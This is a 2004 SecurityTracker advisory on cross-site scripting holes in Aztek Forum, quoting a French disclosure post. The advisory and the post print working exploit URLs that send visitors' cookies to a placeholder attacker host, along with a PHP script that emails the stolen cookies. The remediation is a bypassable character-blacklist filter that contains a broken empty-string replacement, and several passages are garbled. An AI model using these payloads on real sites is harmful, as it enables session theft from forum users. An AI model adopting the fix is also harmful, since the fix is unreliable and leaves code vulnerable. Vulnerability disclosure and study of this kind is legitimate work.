SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Aztek Forum Vendors:   forum-aztek.com
Aztek Forum Input Validation Holes Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1012213
SecurityTracker URL:  http://securitytracker.com/id/1012213
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 12 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  

Description:   benjilenoob reported some input validation vulnerabilities in Aztek Forum. A remote user can conduct cross-site scripting attacks.

It is reported that several scripts do not properly validate user-supplied input to remove HTML code before displaying information based on the user-supplied input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Aztek Forum software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

It is reported that 'forum_2.php' does not validate the 'return' and 'title' variables. A demonstration exploit URL is provided:

http://[target]/forum%20aztek/forum_2.php?msg=10
&return=')%3C/script%3E%3Cscript%3E%20%20document.location=%20'www.site.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E

It is also reported that 'search.php' does not validate search queries.

It is also reported that 'subscribe.php' does not validate the 'email' variable.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Aztek Forum software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.forum-aztek.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  failles dans forum aztek


Faille XSS dans Forum Aztek:

Trouver la faille:

Il y a une faille XSS dans la variable $return:
http://www.victime.com/forum aztek/forum_2.php?msg=10&return=

Donc il suffit de lire la source pour s'apercevoire que si nous injectons 
ceci:
')</script><script>alert(document.cookie)</script>
il fait apparaitre parfaitement le cookie !

Donc si nous voulons exploiter la faille il faudrai faire un script comme 
ceci:
<script>
document.location= 'www.site.com/code_evil.php?cookie=' 
+window.document.cookie;
</script>

Et dans le fichier code_evil.php:
<?php

$cokie = $_GET['cookie'];
mail('votre_email@hebergeur.com', 'You just stole a
cookie', $cokie);

?>

Donc l'url complete donne:
http://www.victime.com/forum%20aztek/forum_2.php?msg=10
&return=')%3C/script%3E%3Cscript%3E%20%20document.location=%20'www.site.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E

Corriger la faille:

suffit pour la corriger de convertir les caracteres dangeureux en espace:
$return = str_replace("<"," ", $return);
$return = str_replace(">"," ", $return);
$return = str_replace("script"," ", $return);
$return = str_replace("?"," ", $return);
$return = str_replace(";"," ", $return);
$return = str_replace(":"," ", $return);
$return = str_replace("!"," ", $return);
$return = str_replace("="," ", $return);
$return = str_replace("$"," ", $return);
$return = str_replace("%"," ", $return);
$return = str_replace("]"," ", $return);
$return = str_replace("["," ", $return);
$return = str_replace("javascript"," ", $return);
$return = str_replace("*"," ", $return);
$return = str_replace(")"," ", $return);
$return = str_replace("("," ", $return);
$return = str_replace(""," ", $return);
$return = str_replace("#"," ", $return);
$return = str_replace("_"," ", $return);
$return = str_replace("^"," ", $return);
$return = str_replace("|"," ", $return);
$return = str_replace("}"," ", $return);
$return = str_replace("{"," ", $return);
$return = str_replace("+"," ", $return);
$return = str_replace("-"," ", $return);
$return = str_replace("/"," ", $return);
$return = str_replace("&"," ", $return);
$return = str_replace("php"," ", $return);
$return = str_replace("PHP"," ", $return);
$return = str_replace("html"," ", $return);
$return = str_replace("body"," ", $return);
$return = str_replace("head"," ", $return);
$return = str_replace("title"," ", $return);
$return = str_replace("form"," ", $return);
$return = str_replace("%22","22", $return);
$return = str_replace("%23","23", $return);
$return = str_replace("%47","47", $return);
$return = str_replace("%44","44", $return);
$return = str_replace("%62","62", $return);
$return = str_replace("%60","60", $return);
$return = str_replace("%37","37", $return);

Donc il faut mettre ce code dans /forum/main.php

##########################################

Search.php

Bon si vous allez dans la partie du forum ou vous allez pouvoir faire des 
recherches alors vous pouvez vous apercevoir que si vous injecter un code 
tel que : "><script>alert('salut')</script> alors sur votre page il va se 
passer quelque chose de tres interressant. Une partie du code source va 

non puisque dans la textbox ou j'ai mi mon code il apparait une partie du 
recherche se nomme $search je regarde quelques lignes plus bas et je vois: 
$search=str_replace("<","&lt;",$search); Bon a partir de la je sais que une 
executer du javascript car les < sont convertis en &lt;
Donc tres bien a partir de ce moment je sais qu'il va mettre difficile 
d'executer du Javascript dans cette variable mais proteger seulement < n'est 
Donc pour ce proteger il suffit de mettre ce code au debut de la source:

$search = str_replace(">"," ", $search);
$search = str_replace("script"," ", $search);
$search = str_replace("?"," ", $search);
$search = str_replace(";"," ", $search);
$search = str_replace(":"," ", $search);
$search = str_replace("!"," ", $search);
$search = str_replace("="," ", $search);
$search = str_replace("$"," ", $search);
$search = str_replace("%"," ", $search);
$search = str_replace("]"," ", $search);
$search = str_replace("["," ", $search);
$search = str_replace("javascript"," ", $search);
$search = str_replace("*"," ", $search);
$search = str_replace(")"," ", $search);
$search = str_replace("("," ", $search);
$search = str_replace(""," ", $search);
$search = str_replace("#"," ", $search);
$search = str_replace("_"," ", $search);
$search = str_replace("^"," ", $search);
$search = str_replace("|"," ", $search);
$search = str_replace("}"," ", $search);
$search = str_replace("{"," ", $search);
$search = str_replace("+"," ", $search);
$search = str_replace("-"," ", $search);
$search = str_replace("/"," ", $search);
$search = str_replace("&"," ", $search);
$search = str_replace("php"," ", $search);
$search = str_replace("PHP"," ", $search);
$search = str_replace("html"," ", $search);
$search = str_replace("body"," ", $search);
$search = str_replace("head"," ", $search);
$search = str_replace("title"," ", $search);
$search = str_replace("form"," ", $search);
$search = str_replace("%22","22", $search);
$search = str_replace("%23","23", $search);
$search = str_replace("%47","47", $search);
$search = str_replace("%44","44", $search);
$search = str_replace("%62","62", $search);
$search = str_replace("%60","60", $search);
$search = str_replace("%37","37", $search);

Il faut mettre ce code dans index/search.php
Maintenant je suis sur que on ne pourra pas attaquer cette variable, du 
moins on ne pourra trouver une XSS ce qui est tres important car ce genre de 
faille est terrible.

Tuto de secu ecris par Benjilenoob

copyright(c)Project2400

Subscribe.php

Bon dans le fichier subscribe.php nous avons le meme type de risque dans 
dans search.php a part que le danger vient de la varialble $email donc il 
suivant apres cette ligne:

function show_subscribe($login,$email){

code:

$email = str_replace("<"," ", $email);
$email = str_replace(">"," ", $email);
$email = str_replace("script"," ", $email);
$email = str_replace("?"," ", $email);
$email = str_replace(";"," ", $email);
$email = str_replace(":"," ", $email);
$email = str_replace("!"," ", $email);
$email = str_replace("="," ", $email);
$email = str_replace("$"," ", $email);
$email = str_replace("%"," ", $email);
$email = str_replace("]"," ", $email);
$email = str_replace("["," ", $email);
$email = str_replace("javascript"," ", $email);
$email = str_replace("*"," ", $email);
$email = str_replace(")"," ", $email);
$email = str_replace("("," ", $email);
$email = str_replace(""," ", $email);
$email = str_replace("#"," ", $email);
$email = str_replace("_"," ", $email);
$email = str_replace("^"," ", $email);
$email = str_replace("|"," ", $email);
$email = str_replace("}"," ", $email);
$email = str_replace("{"," ", $email);
$email = str_replace("+"," ", $email);
$email = str_replace("-"," ", $email);
$email = str_replace("/"," ", $email);
$email = str_replace("&"," ", $email);
$email = str_replace("php"," ", $email);
$email = str_replace("PHP"," ", $email);
$email = str_replace("html"," ", $email);
$email = str_replace("body"," ", $email);
$email = str_replace("head"," ", $email);
$email = str_replace("title"," ", $email);
$email = str_replace("form"," ", $email);
$email = str_replace("%22","22", $email);
$email = str_replace("%23","23", $email);
$email = str_replace("%47","47", $email);
$email = str_replace("%44","44", $email);
$email = str_replace("%62","62", $email);
$email = str_replace("%60","60", $email);
$email = str_replace("%37","37", $email);

Il faut mettre ce code dans index/subscribe.php

Rappelez vous d'une chose c'est que meme si vous vous pensez que une attaque 
dans cette variable est impossible car il filtre deja < ceci n'est pas 
forcement le cas car des gens trouveront toujours une astuce pour contourner 
ceci et que donc securiser un maximun de chose est le mieu, je le sais 
d'experience. LA SECU N'A PAS DE PRIX

Tuto de secu ecris par Benjilenoob

copyright(c)Project2400

Subscribe.php

Bon toujours dans ce meme fichier les autres variables tel que $login 
fonctionnent de la meme maniere que $email donc pour meme probleme meme 
solution. Vous n'avez qu'a remplacer dans le code precedant $email par 
$login et remettre le code a la suite. Voila je pense que vous devriez etre 

Tuto de secu ecris par Benjilenoob
#############################################
Faille XSS dans forum Aztek:

Trouver la Faille:

Il y a une faille dans la variable $title :
http://www.victime.com/forum%20aztek/forum_2.php?choix=2&title=

Elle fonctionne comme $return il suffit de mettre le code suivant dedans:
")><script>alert(document.cookie)</script>

Avec l'attaquant peut choper les cookies, les passes de n'importe qui allant 
sur la page:
http://www.victime.com/forum%20aztek/forum_2.php?msg=10

&title=')><script>%20%20document.location=%20'www.site.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E

Il suffit de mettre dans le code_evil.php:
<?php

$cokie = $_GET['cookie'];
mail('votre_email@hebergeur.com', 'You just stole a
cookie', $cokie);

?>

Comment corriger la faille:

Il suffit de mettre le code suivant dans new_post.php poiur convertir tout 
les mechants caracteres en espace:
$title = str_replace("<"," ", $title);
$title = str_replace(">"," ", $title);
$title = str_replace("script"," ", $title);
$title = str_replace("?"," ", $title);
$title = str_replace(";"," ", $title);
$title = str_replace(":"," ", $title);
$title = str_replace("!"," ", $title);
$title = str_replace("="," ", $title);
$title = str_replace("$"," ", $title);
$title = str_replace("%"," ", $title);
$title = str_replace("]"," ", $title);
$title = str_replace("["," ", $title);
$title = str_replace("javascript"," ", $title);
$title = str_replace("*"," ", $title);
$title = str_replace(")"," ", $title);
$title = str_replace("("," ", $title);
$title = str_replace(""," ", $title);
$title = str_replace("#"," ", $title);
$title = str_replace("_"," ", $title);
$title = str_replace("^"," ", $title);
$title = str_replace("|"," ", $title);
$title = str_replace("}"," ", $title);
$title = str_replace("{"," ", $title);
$title = str_replace("+"," ", $title);
$title = str_replace("-"," ", $title);
$title = str_replace("/"," ", $title);
$title = str_replace("&"," ", $title);
$title = str_replace("php"," ", $title);
$title = str_replace("PHP"," ", $title);
$title = str_replace("html"," ", $title);
$title = str_replace("body"," ", $title);
$title = str_replace("head"," ", $title);
$title = str_replace("title"," ", $title);
$title = str_replace("form"," ", $title);
$title = str_replace("%22","22", $title);
$title = str_replace("%23","23", $title);
$title = str_replace("%47","47", $title);
$title = str_replace("%44","44", $title);
$title = str_replace("%62","62", $title);
$title = str_replace("%60","60", $title);
$title = str_replace("%37","37", $title);

Il suffit de mettre ce code dans le fichier faillible et hop plus de faille.

Cette faille est aussi presente dans inbox.php donc faite la meme chose pour 
la corriger.


_________________________________________________________________
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC